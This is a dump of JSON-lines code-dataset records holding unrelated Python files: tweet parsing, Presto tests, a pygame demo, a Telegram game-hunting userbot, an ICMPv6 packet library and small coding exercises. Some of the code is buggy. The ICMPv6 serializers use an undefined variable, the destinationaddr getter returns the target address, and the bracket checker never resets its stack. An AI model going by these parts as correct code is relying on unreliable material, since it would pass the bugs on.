([tweet['entities']['hashtags'][i]['text'] for i in range(0,len(tweet['entities']['hashtags']))]) \n except:\n hashtags = \"UNKNOWN\"\n #Get url from tweet\n try:\n url = (tweet['entities']['urls'][0]['url'])\n except:\n url = \"UNKNOWN\"\n\n #Print all metrics into tab separated line\n #print([real_name,user_name,followers_count,verified_status,text,lang,hashtags,url])\n print(real_name + \"\\t\" + user_name + \"\\t\" + str(followers_count) + \"\\t\" + str(text_form) + \"\\t\" + re_tweet + \"\\t\" + lang + \"\\t\" + str(hashtags) + \"\\t\" + url)\n #print(str(text_form))\n tweets_data.append(tweet)\n \n except:\n continue\n \n \n#print how many tweets were processed\nprint (len(tweets_data))\n","repo_name":"KaiJeng/MSDS_Twitter_Trend","sub_path":"process_tweets.py","file_name":"process_tweets.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21223326898","text":"\"\"\"Presto integration tests.\nThese rely on having a Presto+Hadoop cluster set up.\nThey also require a tables created by make_test_tables.sh.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom tornado import gen\nfrom tornado.concurrent import Future\nfrom tornado.httpclient import HTTPResponse, HTTPRequest, AsyncHTTPClient\nfrom tornado.testing import AsyncTestCase, gen_test\nfrom prestornado.tests.dbapi_test_case import with_cursor, DBAPITestCase\nfrom prestornado import exc\nfrom prestornado import presto\nfrom StringIO import StringIO\nimport mock\nimport os\n\n_HOST = os.environ.get('PRESTO_HOST', 'localhost')\n\n\nclass TestPresto(AsyncTestCase, DBAPITestCase):\n\n def connect(self):\n return presto.connect(host=_HOST, source=self.id())\n\n def run_gen(self, f):\n f()\n return self.wait()\n\n def setup_fetch(self, fetch_mock, status_code, body=None):\n \"\"\"Copied from https://groups.google.com/forum/#!topic/python-tornado/LrXqiL6InTM\"\"\"\n def side_effect(request, **kwargs):\n if request is not HTTPRequest:\n request = HTTPRequest(request)\n buffer = StringIO(body)\n response = HTTPResponse(request, status_code, None, buffer)\n future = Future()\n future.set_result(response)\n return future\n fetch_mock.side_effect = side_effect\n\n @with_cursor\n @gen_test\n def test_description(self, cursor):\n yield cursor.execute('SELECT 1 AS foobar FROM one_row')\n # wait to finish\n while (yield cursor.poll()):\n pass\n self.assertEqual(cursor.description, [('foobar', 'bigint', None, None, None, None, True)])\n\n @with_cursor\n @gen_test\n def test_stats(self, cursor):\n yield cursor.execute('SELECT 1 AS foobar FROM one_row')\n # wait to finish\n while (yield cursor.poll()):\n pass\n self.assertIsInstance(cursor.stats, dict)\n\n @with_cursor\n @gen_test\n def test_query_id(self, cursor):\n yield cursor.execute('SELECT 1 AS foobar FROM one_row')\n # wait to finish\n while (yield cursor.poll()):\n pass\n self.assertIsNotNone(cursor.query_id)\n\n @with_cursor\n @gen_test\n def test_complex(self, cursor):\n yield cursor.execute('SELECT * FROM one_row_complex')\n # wait to finish\n while (yield cursor.poll()):\n pass\n # TODO Presto drops the union and decimal fields\n self.assertEqual(cursor.description, [\n ('boolean', 'boolean', None, None, None, None, True),\n ('tinyint', 'bigint', None, None, None, None, True),\n ('smallint', 'bigint', None, None, None, None, True),\n ('int', 'bigint', None, None, None, None, True),\n ('bigint', 'bigint', None, None, None, None, True),\n ('float', 
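# Hedged sketch: process_tweets.py guards every field with its own
# try/except; a small helper (hypothetical, not in the record) expresses the
# same "UNKNOWN on any missing key" intent once:
def field(tweet, *path, default="UNKNOWN"):
    current = tweet
    for key in path:
        if not isinstance(current, dict) or key not in current:
            return default
        current = current[key]
    return current

# e.g. field(tweet, 'user', 'screen_name') or field(tweet, 'user',
# 'followers_count'); list-indexed paths like entities.urls[0].url would
# still need their own guard.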
'double', None, None, None, None, True),\n ('double', 'double', None, None, None, None, True),\n ('string', 'varchar', None, None, None, None, True),\n ('timestamp', 'timestamp', None, None, None, None, True),\n ('binary', 'varbinary', None, None, None, None, True),\n ('array', 'array', None, None, None, None, True),\n ('map', 'map', None, None, None, None, True),\n ('struct', \"row('a','b')\", None, None, None, None, True),\n #('union', 'varchar', None, None, None, None, True),\n #('decimal', 'double', None, None, None, None, True),\n ])\n data = yield cursor.fetchall()\n self.assertEqual(data, [[\n True,\n 127,\n 32767,\n 2147483647,\n 9223372036854775807,\n 0.5,\n 0.25,\n 'a string',\n '1970-01-01 08:00:00.000',\n '123',\n [1, 2],\n {\"1\": 2, \"3\": 4}, # Presto converts all keys to strings so that they're valid JSON\n [1, 2], # struct is returned as a list of elements\n #'{0:1}',\n #0.1,\n ]])\n\n def test_noops(self):\n \"\"\"The DB-API specification requires that certain actions exist, even though they might not\n be applicable.\"\"\"\n # Wohoo inflating coverage stats!\n connection = self.connect()\n cursor = connection.cursor()\n self.assertEqual(cursor.rowcount, -1)\n cursor.setinputsizes([])\n cursor.setoutputsize(1, 'blah')\n connection.commit()\n\n @mock.patch.object(AsyncHTTPClient, 'fetch')\n def test_non_200(self, fetch):\n self.setup_fetch(fetch, 404, '')\n cursor = self.connect().cursor()\n\n @gen.engine\n def f():\n yield cursor.execute('show tables')\n self.stop()\n\n self.assertRaises(exc.OperationalError, self.run_gen, f)\n\n @with_cursor\n @gen_test\n def test_poll(self, cursor):\n\n @gen.engine\n def f():\n yield cursor.poll()\n self.stop()\n\n self.assertRaises(presto.ProgrammingError, self.run_gen, f)\n\n yield cursor.execute('SELECT * FROM one_row')\n while True:\n status = yield cursor.poll()\n if status is None:\n break\n self.assertIn('stats', status)\n\n def fail(*args, **kwargs):\n self.fail(\"Should not need requests.get after done polling\") # pragma: no cover\n\n with mock.patch.object(AsyncHTTPClient, 'fetch') as fetch:\n fetch.side_effect = fail\n self.assertEqual((yield cursor.fetchall()), [[1]])\n","repo_name":"jianingy/prestornado","sub_path":"prestornado/tests/test_prestornado.py","file_name":"test_prestornado.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"70640939414","text":"import pygame\n\n# Define grid and block size\nGRID_WIDTH = 12\nGRID_HEIGHT = 16\nBLOCK_SIZE = 20\n\nclass GridBlock:\n def __init__(self, grid_x, grid_y):\n self.grid_x = grid_x\n self.grid_y = grid_y\n self.screen_x = grid_x * BLOCK_SIZE\n self.screen_y = grid_y * BLOCK_SIZE\n self.color = (255, 0, 0) # Example color (red)\n\n def draw(self, screen):\n pygame.draw.rect(screen, self.color, (self.screen_x, self.screen_y, BLOCK_SIZE, BLOCK_SIZE))\n\n# Initialize Pygame\npygame.init()\n\n# Set up the game window\nscreen_width = GRID_WIDTH * BLOCK_SIZE\nscreen_height = GRID_HEIGHT * BLOCK_SIZE\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Grid Example\")\n\n# Create a grid of blocks\ngrid = [[GridBlock(x, y) for x in range(GRID_WIDTH)] for y in range(GRID_HEIGHT)]\n\n# Main game loop\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # Draw everything\n screen.fill((255, 255, 255)) # Fill the screen with white\n\n # Draw the grid\n for row in grid:\n for 
block in row:\n block.draw(screen)\n\n pygame.display.flip()\n\n# Quit Pygame\npygame.quit()\n","repo_name":"np123-glitch/pythonsnakegame","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25120461780","text":"from telethon.sync import TelegramClient\nfrom telethon import events\nimport asyncio\nfrom telethon.sessions import StringSession\nfrom telethon import events\nfrom constants import CMD_PREFIX\nfrom constants import API_HASH, API_ID, SESSION_KEY\nimport time\n\npoke_list = [ 'Mewtwo', 'Aerodactyl', 'Alakazam', 'Greninja', 'Pheromosa', 'Flabebe', 'Muk', 'Froakie', 'Frogadier', 'Floette', 'Poiple', 'Primarina', 'Grimer', 'Muk',\n 'Skrelp', 'Dragalge', 'Sneasel', 'weavile', 'Cosmog', 'Cosmeom', 'Zubat', 'Golbat', 'Crobat']\n\npoke_list2 = ['Found!', '', 'Ninjask', 'Aerodactyl', '', '', 'Mewtwo', 'Mew', 'Deoxys', '', 'Groudon', 'Kyogre', 'Rayquaza', '', 'Diancie', 'Slaking', 'Dialga',\n 'Palkia', 'Arceus', 'Regigigas', 'Darkrai', 'Cressellia', 'Giratina', '', '', 'Reshiram', 'Zekrom', 'Kyurem', 'Landorus', 'Thundurus', 'Tornadus', 'Meloetta', 'Greninja',\n 'Xerneas', 'Yveltal', 'Zygarde', 'Hoopa', 'Cosmog', 'Cosmoem', 'Solgaleo', 'Lunala', 'Necrozma', 'Magearna', 'Marshadow', 'Pheromosa', 'Poipole', 'Naganadel',\n 'Zeraora', 'Pheromosa', 'Sylveon', 'Metagross']\n\n#Thanks Anil Vro\nwith TelegramClient(StringSession(SESSION_KEY), API_ID, API_HASH,) as client:\n\n\n @client.on(events.NewMessage(outgoing=True, pattern=CMD_PREFIX + \"hexamatch (.*) (\\w+)\"))\n async def hexamatch(event):\n bid = 572621020\n msg = \"/hunt\"\n times_hunt = event.pattern_match.group(1)\n set_sec = event.pattern_match.group(2)\n eta = int((int(times_hunt) * int(set_sec))/60)\n if not times_hunt.isnumeric():\n text = \"`Onii-sama nHunts and nSex both must be integers :)`\"\n await event.edit(text)\n else:\n await event.edit(\n f\"\\n`Yo, Shido 🙋🏻`\"\n f\"\\n\\n`I will be hunting {times_hunt} times.`\"\n f\"\\n\\n`I will stop the hunting if I encounter any poke from the list.`\"\n f\"\\n\\n`ETA for this hunt is around {eta} minutes.`\")\n async with client.conversation('Hexamonbot') as conv:\n for i in range(int(times_hunt)):\n await conv.send_message('/hunt')\n if int(i) == int(times_hunt)-1:\n await event.reply(\"`Hunting complete.`\")\n else:\n poke_r = await conv.get_response()\n get_res_msg = poke_r.text.split(\" \")\n get_poke_n = get_res_msg[2].replace(\"**\",\"\") \n \n if get_poke_n in poke_list:\n print(f'In list: {get_poke_n}')\n await event.reply(f\"Shido-San, {get_poke_n} has appeared. 
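# Hedged note on test.py above: its main loop redraws as fast as the CPU
# allows; a pygame.time.Clock (standard pygame, though not used in the
# record) would cap the frame rate:
import pygame

clock = pygame.time.Clock()
# ...then, at the end of each pass through the record's while-loop, after
# pygame.display.flip():
clock.tick(60)  # blocks just long enough to hold roughly 60 frames/second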
Let\\'s catch it.\") \n break\n else:\n time.sleep(int(set_sec))\n \n @client.on(events.NewMessage(outgoing=True, pattern=CMD_PREFIX + \"hexa (.*) (\\w+)\"))\n async def hexa(event):\n bid = 572621020\n msg = \"/hunt\"\n times_hunt = event.pattern_match.group(1)\n set_sec = event.pattern_match.group(2)\n eta = int((int(times_hunt) * int(set_sec))/60)\n if not times_hunt.isnumeric():\n text = \"`Onii-sama nHunts and nSex both must be integers :)`\"\n await event.edit(text)\n else:\n await event.edit(\n f\"\\n`Yo, Shido 🙋🏻`\"\n f\"\\n\\n`I will be hunting {times_hunt} times.`\"\n f\"\\n\\n`ETA for this hunt is around {eta} minutes.`\")\n for i in range(int(times_hunt)):\n await client.send_message(bid,msg)\n if int(i) == int(times_hunt)-1:\n await event.reply(\"`Hunting complete.`\")\n else:\n time.sleep(int(set_sec))\n\n @client.on(events.NewMessage(outgoing=True, pattern=CMD_PREFIX + \"list\"))\n async def list(event):\n await event.reply(\n f\"`{poke_list}`\"\n f\"`\\n\\nEdit the list in main.py on GitHub.`\")\n\n @client.on(events.NewMessage(outgoing=True, pattern=CMD_PREFIX + \"restart\"))\n async def shutdown_handler(event):\n CMD = CMD_PREFIX[1:]\n await event.edit(f\"**Restarting...**\")\n time.sleep(int(3))\n await event.edit(f\"**Restarted!**\")\n await client.disconnect()\n \n client.run_until_disconnected()\n","repo_name":"shidoxd/yunoxpro","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4571094549","text":"import struct\nfrom ipaddress import IPv6Address\nfrom abc import ABCMeta\n\nfrom .icmp import ICMP, ICMPData, ICMPEchoRequest, ICMPEchoReply\nfrom .common import ICMPv6Type, ICMPv6TypeCodeMap, ICMPv6OptionNumber\nfrom .common import checksum as csum\nfrom ..address import EthAddr\nfrom ..exceptions import *\nfrom sys import byteorder\n\n\n'''\nReferences:\n http://tools.ietf.org/html/rfc4443 (Neighbor Discovery)\n http://tools.ietf.org/html/rfc2710 (Mulicast Listener Discovery)\n Stevens, Fall, TCP/IP Illustrated, Vol 1., 2nd Ed.\n'''\n\n\nclass ICMPv6(ICMP):\n def __init__(self, **kwargs):\n # Another hacky way to make this thing work.. 
super should be last..\n if 'icmptype' in kwargs:\n self.icmp6type = kwargs['icmptype']\n del kwargs['icmptype']\n super().__init__(**kwargs)\n if hasattr(self, \"icmp6type\"):\n kwargs['icmptype'] = self.icmp6type\n\n self._valid_types = ICMPv6Type\n self._valid_codes_map = ICMPv6TypeCodeMap\n self._classtype_from_icmptype = ICMPv6ClassFromType\n self._icmptype_from_classtype = ICMPv6TypeFromClass\n self._type = self._valid_types.EchoRequest\n self._code = self._valid_codes_map[self._type].EchoRequest\n self._icmpdata = ICMPv6ClassFromType(self._type)()\n self._checksum = 0\n # if kwargs are given, must ensure that type gets set\n # before code due to dependencies on validity.\n if 'icmptype' in kwargs:\n self.icmptype = kwargs['icmptype']\n # del kwargs['icmptype']\n\n def checksum(self):\n return self._checksum\n\n def _compute_checksum(self, src, dst, raw):\n sep = b''\n databytes = self._icmpdata.to_bytes()\n icmpsize = ICMP._MINLEN+len(databytes)\n self._checksum = csum(sep.join((src.packed, dst.packed,\n struct.pack('!I3xBBB',\n ICMP._MINLEN+len(databytes),\n 58,\n self._type.value,\n self._code.value),\n databytes)))\n\n def pre_serialize(self, raw, pkt, i):\n ip6hdr = pkt.get_header('IPv6')\n assert(ip6hdr is not None)\n self._compute_checksum(ip6hdr.src, ip6hdr.dst, raw)\n\n\nclass ICMPv6Option(object, metaclass=ABCMeta):\n _PACKFMT = 'B'\n __slots__ = ['_optnum']\n\n def __init__(self, optnum):\n self._optnum = ICMPv6OptionNumber(optnum)\n\n @property\n def optnum(self):\n return self._optnum\n\n def length(self):\n return struct.calcsize(ICMPv6Option._PACKFMT)\n\n def to_bytes(self):\n return struct.pack(ICMPv6Option._PACKFMT, self._optnum.value)\n\n def from_bytes(self, raw):\n return self.length()\n\n def __eq__(self, other):\n return self._optnum == other._optnum\n\n def __str__(self):\n return \"{}\".format(self.__class__.__name__)\n\n\nclass ICMPv6OptionLinkLayerAddress(ICMPv6Option):\n def __init__(self, address=None):\n super().__init__(self._ICMPv6OptionType)\n self._linklayeraddress = EthAddr(address)\n\n def to_bytes(self):\n value = self._linklayeraddress.packed\n length = int.to_bytes(int((len(v) + 2)/8), length=1,\n byteorder=byteorder, signed=False)\n xtype = int.to_bytes(self._ICMPv6OptionType, length=1,\n byteorder=byteorder, signed=False)\n return xtype+length+value\n\n def from_bytes(self, raw):\n type_ = raw[0]\n assert type_ == self._ICMPv6OptionType\n length_ = raw[1] * 8\n # length of option header (t + l + v = 2 + length_)\n # current implementation supports only Ethernet addresses\n assert (length_ - 2) == len(EthAddr())\n self._linklayeraddress = EthAddr(raw[2:length_])\n return length_\n\n def __str__(self):\n return \"{} {}\".format(super().__str__(), self._linklayeraddress)\n\n\nclass ICMPv6OptionSourceLinkLayerAddress(ICMPv6OptionLinkLayerAddress):\n _ICMPv6OptionType = ICMPv6OptionNumber.SourceLinkLayerAddress\n\n\nclass ICMPv6OptionTargetLinkLayerAddress(ICMPv6OptionLinkLayerAddress):\n _ICMPv6OptionType = ICMPv6OptionNumber.TargetLinkLayerAddress\n\n\nclass ICMPv6OptionPrefixInformation(ICMPv6Option):\n pass\n\n\nclass ICMPv6OptionRedirectedHeader(ICMPv6Option):\n _PACKFMT = \"!xxxxxx\"\n _reservedbytes = b'\\x00' * 6\n _max_pkt_len = 8 * 100 # FIXME: hack: arbitrary length; enough for hdrs\n\n def __init__(self, redirected_packet=None):\n if redirected_packet is not None:\n # FIXME: todo: Truncate frame to path MTU?!\n # for now, quick hack to just header and some data\n data = redirected_packet.to_bytes()\n data_length = int((len(data) + 2)/8) 
* 8\n\n if data_length > self._max_pkt_len: # cut to 200B\n data_length = data_length - self._max_pkt_len\n\n # data_length - 2, so option header fits into units on 8 octets\n self._packetdata = redirected_packet.to_bytes()[:(data_length-2)]\n else:\n self._packetdata = None\n\n def to_bytes(self):\n value = ICMPv6OptionRedirectedHeader._reservedbytes + self._packetdata\n\n # FIXME: truncate to 8 octet group\n data_length = int((len(v) + 2)/8)\n length = int.to_bytes(data_length, length=1,\n byteorder=byteorder, signed=False)\n xtype = int.to_bytes(ICMPv6OptionNumber.RedirectedHeader, length=1,\n byteorder=byteorder, signed=False)\n return xtype+length+value[:(data_length*8)-2]\n\n def from_bytes(self, raw):\n type_ = raw[0]\n assert type_ == ICMPv6OptionNumber.RedirectedHeader\n length_ = raw[1] * 8\n # length of option header (t + l + v = 2 + length_)\n\n self._packetdata = raw[2:length_]\n return length_\n\n def __str__(self):\n return \"{} Enclosed packet ({} bytes)\".format(\n super().__str__(), len(self._packetdata))\n\n\nclass ICMPv6OptionMTU(ICMPv6Option):\n pass\n\n\nICMPv6OptionClasses = {\n ICMPv6OptionNumber.SourceLinkLayerAddress:\n ICMPv6OptionSourceLinkLayerAddress,\n ICMPv6OptionNumber.TargetLinkLayerAddress:\n ICMPv6OptionTargetLinkLayerAddress,\n ICMPv6OptionNumber.PrefixInformation: ICMPv6OptionPrefixInformation,\n ICMPv6OptionNumber.RedirectedHeader: ICMPv6OptionRedirectedHeader,\n ICMPv6OptionNumber.MTU: ICMPv6OptionMTU\n}\n\n\nclass ICMPv6OptionList(object):\n def __init__(self):\n self._options = []\n\n @staticmethod\n def from_bytes(rawbytes):\n '''\n Takes a byte string as a parameter and returns a list of\n ICMPv6Option objects.\n '''\n icmpv6popts = ICMPv6OptionList()\n\n i = 0\n while i < len(rawbytes):\n opttype = rawbytes[i]\n optnum = ICMPv6OptionNumber(opttype)\n obj = ICMPv6OptionClasses[optnum]()\n eaten = obj.from_bytes(rawbytes[i:])\n i += eaten\n icmpv6popts.append(obj)\n return icmpv6popts\n\n def to_bytes(self):\n '''\n Takes a list of ICMPv6Option objects and returns a packed byte string\n of options, appropriately padded if necessary.\n '''\n raw = b''\n if not self._options:\n return raw\n for icmpv6popt in self._options:\n raw += icmpv6popt.to_bytes()\n # Padding doesn't seem necessary?\n # RFC states it should be padded to 'natural 64bit boundaries'\n # However, wireshark interprets \\x00 as a malformed option field\n # So for now, ignore padding\n # padbytes = 4 - (len(raw) % 4)\n # raw += b'\\x00'*padbytes\n return raw\n\n def append(self, opt):\n if isinstance(opt, ICMPv6Option):\n self._options.append(opt)\n else:\n raise Exception(\"Option to be added must be an ICMPv6Option \" +\n \"object ( is {} )\".format(type(opt)))\n\n def __len__(self):\n return len(self._options)\n\n def __getitem__(self, i):\n if i < 0:\n i = len(self._options) + i\n if 0 <= i < len(self._options):\n return self._options[i]\n raise IndexError(\"Invalid IP option index\")\n\n def __setitem__(self, i, val):\n if i < 0:\n i = len(self._options) + i\n if not issubclass(val.__class__, ICMPv6Option):\n raise ValueError(\"Assigned value must be of type ICMPv6Option, \" +\n \"but {} is not.\".format(val.__class__.__name__))\n if 0 <= i < len(self._options):\n self._options[i] = val\n else:\n raise IndexError(\"Invalid IP option index\")\n\n def __delitem__(self, i):\n if i < 0:\n i = len(self._options) + i\n if 0 <= i < len(self._options):\n del self._options[i]\n else:\n raise IndexError(\"Invalid IP option index\")\n\n def raw_length(self):\n return 
len(self.to_bytes())\n\n def size(self):\n return len(self._options)\n\n def __eq__(self, other):\n if not isinstance(other, ICMPv6OptionList):\n return False\n if len(self._options) != len(other._options):\n return False\n return self._options == other._options\n\n def __str__(self):\n return \"{} ({})\".format(\n self.__class__.__name__,\n \", \".join([str(opt) for opt in self._options]))\n\n\nclass ICMPv6Data(ICMPData):\n '''Hack to make the inheritance chain happy and lead into v6-specific\n differences; need to fix...'''\n def __init__(self, **kwargs):\n self._options = ICMPv6OptionList()\n super().__init__(**kwargs)\n\n @property\n def options(self):\n return self._options\n\n\nclass ICMPv6EchoRequest(ICMPEchoRequest):\n pass\n\n\nclass ICMPv6EchoReply(ICMPEchoReply):\n pass\n\n\nclass ICMPv6HomeAgentAddressDiscoveryRequestMessage(ICMPv6Data):\n pass\n\n\nclass ICMPv6HomeAgentAddressDiscoveryReplyMessage(ICMPv6Data):\n pass\n\n\nclass ICMPv6MobilePrefixSolicitation(ICMPv6Data):\n pass\n\n\nclass ICMPv6MobilePrefixAdvertisement(ICMPv6Data):\n pass\n\n\nclass ICMPv6MulticastListenerQuery(ICMPv6Data):\n pass\n\n\nclass ICMPv6MulticastListenerReport(ICMPv6Data):\n pass\n\n\nclass ICMPv6MulticastListenerDone(ICMPv6Data):\n pass\n\n\nclass ICMPv6RouterSolicitation(ICMPv6Data):\n pass\n\n\nclass ICMPv6RouterAdvertisement(ICMPv6Data):\n pass\n\n\nclass ICMPv6NeighborSolicitation(ICMPv6Data):\n __slots__ = ['_targetaddr']\n _PACKFMT = \"!xxxx16s\"\n _MINLEN = struct.calcsize(_PACKFMT)\n '''\n possible options:\n * source_link_layer_address: link layer address of sending host\n '''\n\n def __init__(self, **kwargs):\n self._targetaddr = IPv6Address(\"::0\")\n super().__init__(**kwargs)\n\n def to_bytes(self):\n return b''.join((\n struct.pack(ICMPv6NeighborSolicitation._PACKFMT,\n self._targetaddr.packed),\n self._options.to_bytes(), super().to_bytes()))\n\n def from_bytes(self, raw):\n if len(raw) < ICMPv6NeighborSolicitation._MINLEN:\n raise NotEnoughDataError(\"Not enough bytes to unpack \" +\n \"ICMPv6NeighborSolicitation object\")\n optionbytes = raw[ICMPv6NeighborSolicitation._MINLEN:]\n fields = struct.unpack(ICMPv6NeighborSolicitation._PACKFMT,\n raw[:ICMPv6NeighborSolicitation._MINLEN])\n self._targetaddr = IPv6Address(fields[0])\n self._options = ICMPv6OptionList.from_bytes(optionbytes)\n\n @property\n def targetaddr(self):\n return self._targetaddr\n\n @targetaddr.setter\n def targetaddr(self, value):\n print(\"setting target address: {}\".format(IPv6Address(value)))\n self._targetaddr = IPv6Address(value)\n\n def __str__(self):\n s = \"Target address: {}\".format(self._targetaddr)\n if len(self._options) > 0:\n s = \"{} | {}\".format(s, self._options)\n return s\n\n\nclass ICMPv6NeighborAdvertisement(ICMPv6Data):\n __slots__ = ['_R_S_O', '_targetaddr']\n _PACKFMT = \"!cxxx16s\"\n _MINLEN = struct.calcsize(_PACKFMT)\n '''\n possible options:\n * source_link_layer_address: link layer address of sending host\n '''\n def __init__(self, **kwargs):\n self._targetaddr = IPv6Address(\"::0\")\n self._routerflag = 0\n self._solicitedflag = 0\n self._overrideflag = 0\n super().__init__(**kwargs)\n\n def to_bytes(self):\n return b''.join((\n struct.pack(ICMPv6NeighborAdvertisement._PACKFMT,\n self.get_rso_byte(),\n self._targetaddr.packed),\n self._options.to_bytes(), super().to_bytes()))\n\n def from_bytes(self, raw):\n if len(raw) < self._MINLEN:\n raise NotEnoughDataError(\"Not enough bytes to unpack \" +\n \"ICMPv6NeighborAdvertisement object\")\n optionbytes = 
raw[ICMPv6NeighborAdvertisement._MINLEN:]\n fields = struct.unpack(\n ICMPv6NeighborAdvertisement._PACKFMT,\n raw[:ICMPv6NeighborAdvertisement._MINLEN])\n # print('fields[0]: {}'.format(fields[0]))\n rso = int.from_bytes(fields[0], byteorder=byteorder, signed=False)\n self._routerflag = (rso & 0x80) >> 7\n self._solicitedflag = (rso & 0x40) >> 6\n self._overrideflag = (rso & 0x20) >> 5\n self._targetaddr = IPv6Address(fields[1])\n self._options = ICMPv6OptionList.from_bytes(optionbytes)\n\n def get_rso_byte(self):\n rso = self._routerflag << 7 | \\\n self._solicitedflag << 6 | \\\n self._overrideflag << 5\n return int.to_bytes(rso, length=1, byteorder=byteorder, signed=False)\n\n def get_rso_str(self):\n s = ''\n if self.routerflag:\n s += 'R'\n if self.solicitedflag:\n s += 'S'\n if self.overrideflag:\n s += 'O'\n return s\n\n @property\n def targetaddr(self):\n return self._targetaddr\n\n @targetaddr.setter\n def targetaddr(self, value):\n self._targetaddr = IPv6Address(value)\n\n @property\n def routerflag(self):\n return bool(self._routerflag)\n\n @property\n def solicitedflag(self):\n return bool(self._solicitedflag)\n\n @property\n def overrideflag(self):\n return bool(self._overrideflag)\n\n @routerflag.setter\n def routerflag(self, value):\n assert isinstance(value, bool)\n self._routerflag = int(value)\n\n @solicitedflag.setter\n def solicitedflag(self, value):\n assert isinstance(value, bool)\n self._solicitedflag = int(value)\n\n @overrideflag.setter\n def overrideflag(self, value):\n assert isinstance(value, bool)\n self._overrideflag = int(value)\n\n def __str__(self):\n s = \"Target address: {} flags: {} ({})\".format(\n self._targetaddr,\n hex(int.from_bytes(self.get_rso_byte(),\n byteorder=byteorder, signed=False)),\n self.get_rso_str())\n if len(self._options) > 0:\n s = \"{} | {}\".format(s, self._options)\n return s\n\n\nclass ICMPv6RedirectMessage(ICMPv6Data):\n __slots__ = ['_targetaddr', '_destinationaddr']\n _PACKFMT = \"!xxxx16s16s\"\n _MINLEN = struct.calcsize(_PACKFMT)\n '''\n possible options:\n * target_link_layer_address: link layer address of sending host\n * redirected_header: link layer address of sending host\n '''\n\n def __init__(self, **kwargs):\n self._targetaddr = IPv6Address(\"::0\")\n self._destinationaddr = IPv6Address(\"::0\")\n super().__init__(**kwargs)\n\n def to_bytes(self):\n return b''.join((struct.pack(\n ICMPv6RedirectMessage._PACKFMT,\n self._targetaddr.packed, self._destinationaddr.packed),\n self._options.to_bytes(), super().to_bytes()))\n\n def from_bytes(self, raw):\n if len(raw) < self._MINLEN:\n raise NotEnoughDataError(\"Not enough bytes to unpack \" +\n \"ICMPv6RedirectMessage object\")\n optionbytes = raw[self._MINLEN:]\n fields = struct.unpack(\n ICMPv6RedirectMessage._PACKFMT,\n raw[:ICMPv6RedirectMessage._MINLEN])\n self._targetaddr = IPv6Address(fields[0])\n self._destinationaddr = IPv6Address(fields[1])\n self._options = ICMPv6OptionList.from_bytes(optionbytes)\n\n @property\n def targetaddr(self):\n return self._targetaddr\n\n @targetaddr.setter\n def targetaddr(self, value):\n self._targetaddr = IPv6Address(value)\n\n @property\n def destinationaddr(self):\n return self._targetaddr\n\n @destinationaddr.setter\n def destinationaddr(self, value):\n self._destinationaddr = IPv6Address(value)\n\n def __str__(self):\n s = \"Target: {} Destination: {}\".format(\n self._targetaddr,\n self._targetaddr)\n if len(self._options) > 0:\n s = \"{} | {}\".format(s, self._options)\n return s\n\n\ndef construct_icmpv6_class_map():\n clsmap 
= {}\n for xtype in ICMPv6Type:\n clsname = \"ICMPv6{}\".format(xtype.name)\n try:\n cls = eval(clsname)\n except:\n cls = None\n clsmap[xtype] = cls\n\n def inner(icmptype):\n icmptype = ICMPv6Type(icmptype)\n return clsmap.get(icmptype, None)\n return inner\n\n\ndef construct_icmpv6_type_map():\n typemap = {}\n for xtype in ICMPv6Type:\n clsname = \"ICMPv6{}\".format(xtype.name)\n try:\n cls = eval(clsname)\n typemap[cls] = xtype\n except:\n pass\n\n def inner(icmpcls):\n return typemap.get(icmpcls, None)\n return inner\n\n\nICMPv6ClassFromType = construct_icmpv6_class_map()\nICMPv6TypeFromClass = construct_icmpv6_type_map()\n","repo_name":"cppbear/NJU_CN2020","sub_path":"switchyard/lib/packet/icmpv6.py","file_name":"icmpv6.py","file_ext":"py","file_size_in_byte":18001,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"67"} +{"seq_id":"13505181662","text":"class Person:\n def __init__(self, firstName, lastName, idNumber):\n self.firstName = firstName\n self.lastName = lastName\n self.idNumber = idNumber\n\n def printPerson(self):\n print(\"Name:\", self.lastName + \",\", self.firstName)\n print(\"ID:\", self.idNumber)\n\n\nclass Student(Person):\n # Class Constructor\n # Parameters:\n # firstName - A string denoting the Person's first name.\n # lastName - A string denoting the Person's last name.\n # id - An integer denoting the Person's ID number.\n # scores - An array of integers denoting the Person's test scores.\n def __init__(self, firstName, lastName, idNumber, scores):\n self.scores = scores\n super().__init__(firstName, lastName, idNumber)\n\n\n # Function Name: calculate\n # Return: A character denoting the grade.\n def calculate(self):\n\n average = sum(self.scores) / len(self.scores)\n if 90 <= average <= 100: return 'O'\n if 80 <= average <= 90: return 'E'\n if 70 <= average <= 80: return 'A'\n if 55 <= average <= 70: return 'P'\n if 40 <= average <= 55: return 'D'\n if average < 40: return 'T'\n\nif __name__ == '__main__':\n# firstName,lastName,idNum = input().split()\n# scores = list(map(int, input().split()))\n# s = Student(firstName, lastName, idNum, scores)\n s = Student('Anton', 'Ramancou', 174888, [50,60,70])\n s.printPerson()\n print(\"Grade:\", s.calculate())\n","repo_name":"Rc561U/Python_self_education","sub_path":"HackerRank/Day12/Inheritance.py","file_name":"Inheritance.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70639484375","text":"'''\r\n괄호\r\nhttps://www.acmicpc.net/problem/9012\r\n'''\r\nT = int(input()) # 테스트케이스\r\nstring = []\r\nstack = []\r\nfor _ in range(T):\r\n string = list(input()) # 괄호 문자열 입력\r\n\r\n for s in string:\r\n if s == '(':\r\n stack.append(s)\r\n else:\r\n top = len(stack) - 1\r\n if top >= 0 and stack[top] == '(':\r\n stack.pop()\r\n else:\r\n stack.append(s)\r\n \r\n if len(stack) == 0:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\n 